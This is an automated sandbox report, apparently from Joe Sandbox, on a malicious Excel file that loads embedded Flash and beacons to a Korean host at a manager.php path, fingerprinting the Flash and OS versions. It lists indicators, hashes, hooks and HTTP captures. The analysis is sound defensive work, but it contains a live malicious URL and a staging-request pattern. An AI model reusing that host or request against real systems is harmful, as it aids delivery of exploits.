
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 44908
Start time: 19:02:57
Joe Sandbox Product: CloudBasic
Start date: 03.02.2018
Overall analysis duration: 0h 4m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: a.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal64.evad.expl.winXLSX@1/7@2/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 60
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE


Detection

Strategy: Threshold
Score: 64
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior.



Signature Overview



AV Detection:

Antivirus detection for domain / URL
Source: www.dylboiler.co.kr | virustotal: Detection: 4%
Antivirus detection for submitted file
Source: a.xlsx | virustotal: Detection: 22%

Exploits:

Microsoft Office program loads Macromedia Flash Player
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx (4 identical entries)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: EXCEL.EXE | Binary or memory string: DirectInput8Create
Installs a global mouse hook
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Windows user hook set: 0 mouse low level C:\Windows\system32\DINPUT8.dll

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: www.dylboiler.co.kr
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /crossdomain.xml HTTP/1.1 | Accept: */* | Accept-Language: en-US | x-flash-version: 16,0,0,235 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.dylboiler.co.kr | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1 | Accept: */* | Accept-Language: en-US | x-flash-version: 16,0,0,235 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.dylboiler.co.kr | Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.dylboiler.co.kr
Urls found in memory or binary data
Source: EXCEL.EXE | String found in binary or memory: HTTP://
Source: EXCEL.EXE | String found in binary or memory: HTTPS://
Source: EXCEL.EXE | String found in binary or memory: HTTPS://HTTP://o
Source: EXCEL.EXE | String found in binary or memory: file://
Source: EXCEL.EXE | String found in binary or memory: file:///
Source: EXCEL.EXE | String found in binary or memory: file:////
Source: EXCEL.EXE | String found in binary or memory: file:////#?
Source: EXCEL.EXE | String found in binary or memory: file:///C:
Source: EXCEL.EXE | String found in binary or memory: file:///local
Source: EXCEL.EXE | String found in binary or memory: file:///localWithNet
Source: EXCEL.EXE | String found in binary or memory: file:///localWithNetfile:///localfile://dummyCould
Source: EXCEL.EXE | String found in binary or memory: file://pdfmediahttpCookie:URLStreamReadThreadc
Source: EXCEL.EXE | String found in binary or memory: ftp://
Source: EXCEL.EXE | String found in binary or memory: ftp://pt-PTpt-BRes-ES
Source: EXCEL.EXE | String found in binary or memory: http://
Source: EXCEL.EXE | String found in binary or memory: http://%s
Source: EXCEL.EXE | String found in binary or memory: http://%s/
Source: EXCEL.EXE | String found in binary or memory: http://%shttp://a.SharedObject.BadPersistenceSharedObject.UriMismatchpendingReserved
Source: EXCEL.EXE | String found in binary or memory: http://a.
Source: EXCEL.EXE | String found in binary or memory: http://fpdownload2.macromedia.com/get/
Source: EXCEL.EXE | String found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/express/version_win_
Source: EXCEL.EXE | String found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_
Source: EXCEL.EXE | String found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_x
Source: EXCEL.EXE | String found in binary or memory: http://fpdownload2.macromedia.com/get/https://fpdownload.macromedia.com/get/https://www.macromedia.c
Source: EXCEL.EXE | String found in binary or memory: http://https://ftp://file://file:///%02XabczdhcheckPolicyFileexactFitfailed
Source: EXCEL.EXE | String found in binary or memory: http://localhost:8080/axis/services/urn:EDCLicenseService
Source: EXCEL.EXE | String found in binary or memory: http://purl.o
Source: EXCEL.EXE | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: EXCEL.EXE | String found in binary or memory: http://www.
Source: EXCEL.EXE, activeX1.bin | String found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php
Source: EXCEL.EXE | String found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F5
Source: EXCEL.EXE | String found in binary or memory: http://www.macromedia.com
Source: EXCEL.EXE | String found in binary or memory: http://www.macromedia.com/go/player_settings_
Source: EXCEL.EXE | String found in binary or memory: http://www.macromedia.com/go/player_settings_.Unmuted.MutedCamera.UnmutedCamera.MutedMicrophone.Unmu
Source: EXCEL.EXE, crossdomain[1].xml.2.dr | String found in binary or memory: http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd
Source: EXCEL.EXE | String found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
Source: EXCEL.EXE | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: EXCEL.EXE | String found in binary or memory: http://www.openssl.org/support/faq.html.....................
Source: EXCEL.EXE | String found in binary or memory: https://
Source: EXCEL.EXE | String found in binary or memory: https://auth.adobefpl.com/1/
Source: EXCEL.EXE | String found in binary or memory: https://fpdownload.macromedia.com/get/
Source: EXCEL.EXE | String found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
Source: EXCEL.EXE | String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /crossdomain.xml HTTP/1.1 | Accept: */* | Accept-Language: en-US | x-flash-version: 16,0,0,235 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.dylboiler.co.kr | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1 | Accept: */* | Accept-Language: en-US | x-flash-version: 16,0,0,235 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: www.dylboiler.co.kr | Connection: Keep-Alive

System Summary:

Checks whether correct version of .NET is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: Flash.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: EXCEL.EXE
Binary contains paths to development resources
Source: EXCEL.EXE | Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engine | Classification label: mal64.evad.expl.winXLSX@1/7@2/2
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRE54F.tmp
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: a.xlsx | Virustotal: hash found
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (60 identical entries)
Stores large binary data to the registry
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key value created or modified: HKEY_USERS\Software\Microsoft\Office\14.0\Excel FontInfoCache
System process connects to network (likely due to code injection or exploit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Network Connect: 114.108.131.63 80

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph (rendered as an image; node data recovered from the graph text):
Behavior Graph ID: 44908 | Sample: a.xlsx | Start date: 03/02/2018 | Architecture: WINDOWS | Score: 64
  • Process: EXCEL.EXE 58 49 (per the legend: number of created registry values, number of created files), started
  • DNS/IP Info: www.dylboiler.co.kr, 114.108.131.63, ports 49172, 49173, 80, LGDACOMLGDACOMCorporationKR, Korea Republic of
  • DNS/IP Info: 8.8.8.8, ports 53, 63758, GOOGLE-GoogleIncUS, United States
  • Dropped file: C:\Users\user\Desktop\~$a.xlsx, data
  • Signatures: Antivirus detection for domain / URL; Antivirus detection for submitted file; System process connects to network (likely due to code injection or exploit); Microsoft Office program loads Macromedia Flash Player

Simulations

Behavior and APIs

Time | Type | Description
19:03:29 | API Interceptor | 2x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
19:03:29 | API Interceptor | 657x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

Source | Detection | Cloud
a.xlsx | 22% | virustotal

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud
www.dylboiler.co.kr | 4% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
LGDACOMLGDACOMCorporationKR | 31youtubeer@youtube.exe | ecb0852024820c4b3426c5e10570e9397e887a959d1a5827578a07200f51afff | malicious | 211.169.146.91
LGDACOMLGDACOMCorporationKR | winupdate.exe | 2161c4f303c9b5f38a58fa1dedf3f70329c6009a273d6be0a2b4a945f2114b02 | malicious | 110.45.144.153
LGDACOMLGDACOMCorporationKR | Lx9gbXEjct.exe | d750ac2061df6fd607d901ad918e9e1f0693e044e399c863d8d09eb0c866100a | malicious | 211.234.63.232
LGDACOMLGDACOMCorporationKR | 44PI-7993INV#-2017.exe | 1356d7bc326b6b2837a6a3fd6a740487d8493cf7336275567bbf7be5be541505 | malicious | 211.234.63.232
LGDACOMLGDACOMCorporationKR | rinnai.co.kr | - | malicious | 58.72.180.22
LGDACOMLGDACOMCorporationKR | 7#U7eJQOO5OUO54VOC737089BY30.js | 1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0 | malicious | 211.40.221.67
LGDACOMLGDACOMCorporationKR | 19QUOTATION.exe | 1d8730fb8718b3e9765cf8146c71da54d853fc5da73065a7bfd3509ec8ec261b | malicious | 211.234.63.232
LGDACOMLGDACOMCorporationKR | LWop1cXK0.exe | 33da905c31916f6c8f457eba354991f2018e7d7c888f160843b42a229aa078c0 | malicious | 114.108.160.134

Dropped Files

No context

Screenshot


Startup

  • System is w7
  • EXCEL.EXE (PID: 3584 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 716335EDBB91DA84FC102425BFDA957E)
  • cleanup

Created / dropped Files

C:\Users\SAMTAR~1\AppData\Local\Temp\Excel8.0\ShockwaveFlashObjects.exd
File Type: data
Size (bytes): 21924
Entropy (8bit): 4.478695190024331
Encrypted: false
MD5: 8C56941EA80A352B16BD341E2046A970
SHA1: 98D20CEC9D7B5DA66240C3F395037EA3C5C5B577
SHA-256: 57AA3EFA4FC50266B2EA550F1343CCAA752C0C2DA47B027AC4BD7067EA60BF9B
SHA-512: DAF052F898D70886DABA4B5103AEB7DC5022C463AE6CE6916BE6CCBE59AC1BA5E2E6786EEA57237E4F899D9B769DD7867CDA58484E28E9BCC81D3B248B6CC6C9
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\crossdomain[1].xml
File Type: XML document text
Size (bytes): 342
Entropy (8bit): 4.9086478647208605
Encrypted: false
MD5: D57E6FC37DE0EB06DF4AA8A77231B2E5
SHA1: 57EAC9A330F041B0716186941A15E572F42D8EED
SHA-256: 16BC92C38028721B6AFF0852158ECFBB66852D2F5F79380A5152E5F25AD30C2E
SHA-512: C763166C6FBB088A608181B81C03DA9E4AF9C1D7E7633FA72DC906B5053BF172C54613E71F1A48087299A0DA70371E6200BFAC1D50E3942EBE9C4DBBDD335BAF
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes): 940
Entropy (8bit): 2.2633111018826657
Encrypted: false
MD5: 6D52F5DA335385F403FA9E08F25A8B27
SHA1: 1CF4F6C52EE4DBDADC6D899CD0A54A2BB4DF4424
SHA-256: FD7BBC4846622C73726859C1690532062089F281DC861D9E26F1AD32EA0DF6A7
SHA-512: CC59A1EBAFCC069113FBCDAEC1F3FA4DD4C3EDFD105F22C154470E0B3065EBDB2A4818FE181F06CDE6CBB790260CD4DA1CEA5D6DCA688621B65F166F39A0CED6
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
File Type: data
Size (bytes): 6400
Entropy (8bit): 4.657281124034824
Encrypted: false
MD5: 921E48048FCC60ED8C239FD98EA2FC01
SHA1: AFEE82E25F73489BE3BF968E3C003981B8011038
SHA-256: 1F393B9330DB706BE919A1DE20FBC757A4B112C2621E9DCD9AE6118665E29AAC
SHA-512: FE07FE875C4BAAE088DE733CA3B9E72809FB0B3C54ABD03D65473602C6DB7B68F818D128A27EB91681B75E062C9F2859A85980820E8655CC3D137678D4E9372E
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a.LNK
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:02:10 2017, mtime=Sun Sep 24 14:02:10 2017, atime=Sat Feb 3 18:03:23 2018, length=126305, window=hide
Size (bytes): 1988
Entropy (8bit): 4.524838333572448
Encrypted: false
MD5: CE00AB1D185042B391947DB2E00A82FD
SHA1: 25944F91A1088FA08FDB6D91360555CB270F5FB5
SHA-256: AEA8F91174753642F1493C8C798CF0B14C03E65687CAF082237ECF12BF4B5225
SHA-512: 10F2154CEF3A86E4C967EAB7BFF5ECE533B5BB88FD6EFC2239384D8FAD3274A023E52C793D975483DF8EED61242E8DFACBDB8CDF2470CCBF723AC114630FBB59
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type: ASCII text, with CRLF line terminators
Size (bytes): 43
Entropy (8bit): 3.83316025553889
Encrypted: false
MD5: 5753A3F78C5A08A75A0011D513968E4E
SHA1: 4AC1A925251C9ECA83DB5FFBCA94B9A63C00E02A
SHA-256: 06FF635C0568C53B0037C9F1AEF47F52E3F35C248945F58C93085E995AE82BA0
SHA-512: E5165765DF43A3539A7835B500905CB764C4E982693BB3A36E54E1FCB1E6041879FD5080FDB8CB0D86A43083DF21BC14758CD916E44B686EDDBA171C53D2CA38
Malicious: false
Reputation: low

C:\Users\user\Desktop\~$a.xlsx
File Type: data
Size (bytes): 165
Entropy (8bit): 1.8123539313128556
Encrypted: false
MD5: 5D1C23E469CB1A62CFEFAF0D295D25B9
SHA1: B542C97B9B9A5218AB7B362B565C387AB02454AD
SHA-256: 4A585BEF8FCF913E857F2B0AD28B665DD2329521901E23BF8527FD8F3BA13D15
SHA-512: C8413843B39C086093DF545BF50FEF8C7200799D41E2D1A4C789C13A1C2277EFD85A7125EDDECCDA46219EAAFAEC17805553CDF3FDB02A6186B7B3D43AEBB3A9
Malicious: true
Reputation: moderate, very likely benign file

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection
www.dylboiler.co.kr | 114.108.131.63 | true | true | 4%, virustotal

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
8.8.8.8 | United States | 15169 | GOOGLE-GoogleIncUS | false
114.108.131.63 | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.961208356093016
TrID:
  • Excel Microsoft Office Open XML Format document (50504/1) 92.65%
  • ZIP compressed archive (4004/1) 7.35%
File name: a.xlsx
File size: 126305
MD5: 5f97c5ea28c0401abc093069a50aa1f8
SHA1: 15053a986dc12c9f353f4940d7d918871d337aed
SHA256: 14c58e3894258c54e12d52d0fba0aafa258222ce9223a1fdc8a946fd169d8a12
SHA512: 94f5d406e822a9b9ff330d8046e56a8f76a24ba6745fd90e67458c7dea94363fe0900c1db5db87d1ee9d15ddfc8549d990cf791597ec57ebc59a200ffc3e14c3
File Content Preview: PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 3, 2018 19:03:45.458077908 CET | 63758 | 53 | 192.168.2.3 | 8.8.8.8
Feb 3, 2018 19:03:46.480983019 CET | 63758 | 53 | 192.168.2.3 | 8.8.8.8
Feb 3, 2018 19:03:47.413377047 CET | 53 | 63758 | 8.8.8.8 | 192.168.2.3
Feb 3, 2018 19:03:47.413408995 CET | 53 | 63758 | 8.8.8.8 | 192.168.2.3
Feb 3, 2018 19:03:47.467498064 CET | 49172 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:47.467519999 CET | 80 | 49172 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:47.467619896 CET | 49172 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:47.468636990 CET | 49172 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:47.468648911 CET | 80 | 49172 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:48.668015957 CET | 80 | 49172 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:48.668052912 CET | 80 | 49172 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:48.668133974 CET | 49172 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:48.668344975 CET | 49172 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:48.668359995 CET | 80 | 49172 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:48.710907936 CET | 49173 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:48.710928917 CET | 80 | 49173 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:48.710992098 CET | 49173 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:48.711327076 CET | 49173 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:48.711335897 CET | 80 | 49173 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:49.615161896 CET | 80 | 49173 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:49.615183115 CET | 80 | 49173 | 114.108.131.63 | 192.168.2.3
Feb 3, 2018 19:03:49.615437984 CET | 49173 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:49.615576982 CET | 49173 | 80 | 192.168.2.3 | 114.108.131.63
Feb 3, 2018 19:03:49.615593910 CET | 80 | 49173 | 114.108.131.63 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 3, 2018 19:03:45.458077908 CET | 63758 | 53 | 192.168.2.3 | 8.8.8.8
Feb 3, 2018 19:03:46.480983019 CET | 63758 | 53 | 192.168.2.3 | 8.8.8.8
Feb 3, 2018 19:03:47.413377047 CET | 53 | 63758 | 8.8.8.8 | 192.168.2.3
Feb 3, 2018 19:03:47.413408995 CET | 53 | 63758 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 3, 2018 19:03:45.458077908 CET | 192.168.2.3 | 8.8.8.8 | 0xc29e | Standard query (0) | www.dylboiler.co.kr | A (IP address) | IN (0x0001)
Feb 3, 2018 19:03:46.480983019 CET | 192.168.2.3 | 8.8.8.8 | 0xc29e | Standard query (0) | www.dylboiler.co.kr | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 3, 2018 19:03:47.413377047 CET | 8.8.8.8 | 192.168.2.3 | 0xc29e | No error (0) | www.dylboiler.co.kr | - | 114.108.131.63 | A (IP address) | IN (0x0001)
Feb 3, 2018 19:03:47.413408995 CET | 8.8.8.8 | 192.168.2.3 | 0xc29e | No error (0) | www.dylboiler.co.kr | - | 114.108.131.63 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • www.dylboiler.co.kr

HTTP Packets

Session ID: 0 | Source IP: 192.168.2.3 | Source Port: 49172 | Destination IP: 114.108.131.63 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 3, 2018 19:03:47.468636990 CET | 1 | OUT | GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.dylboiler.co.kr
Connection: Keep-Alive
Feb 3, 2018 19:03:48.668015957 CET | 1 | IN | HTTP/1.0 200 OK
Date: Sat, 03 Feb 2018 18:03:47 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 04 Dec 2017 11:22:31 GMT
ETag: "10616fc-156-55f81ef2c73a7"
Accept-Ranges: bytes
Content-Length: 342
Connection: close
Content-Type: text/xml
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 20 53 59 53 54 45 4d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 63 72 6f 6d 65 64 69 61 2e 63 6f 6d 2f 78 6d 6c 2f 64 74 64 73 2f 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 2e 64 74 64 22 3e 0d 0a 3c 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 3e 0d 0a 20 20 20 20 3c 73 69 74 65 2d 63 6f 6e 74 72 6f 6c 20 70 65 72 6d 69 74 74 65 64 2d 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 69 65 73 3d 22 61 6c 6c 22 2f 3e 0d 0a 20 20 20 20 3c 61 6c 6c 6f 77 2d 61 63 63 65 73 73 2d 66 72 6f 6d 20 64 6f 6d 61 69 6e 3d 22 2a 22 20 74 6f 2d 70 6f 72 74 73 3d 22 2a 22 20 2f 3e 0d 0a 20 20 20 20 3c 61 6c 6c 6f 77 2d 68 74 74 70 2d 72 65 71 75 65 73 74 2d 68 65 61 64 65 72 73 2d 66 72 6f 6d 20 64 6f 6d 61 69 6e 3d 22 2a 22 20 68 65 61 64 65 72 73 3d 22 2a 22 20 2f 3e 0d 0a 3c 2f 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 3e
Data Ascii: <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" to-ports="*" /> <allow-http-request-headers-from domain="*" headers="*" /></cross-domain-policy>


Session ID: 1 | Source IP: 192.168.2.3 | Source Port: 49173 | Destination IP: 114.108.131.63 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 3, 2018 19:03:48.711327076 CET | 2 | OUT | GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.dylboiler.co.kr
Connection: Keep-Alive
Feb 3, 2018 19:03:49.615161896 CET | 3 | IN | HTTP/1.0 404 Not Found
Date: Sat, 03 Feb 2018 18:03:48 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 353
Connection: close
Content-Type: text/html; charset=iso-8859-1
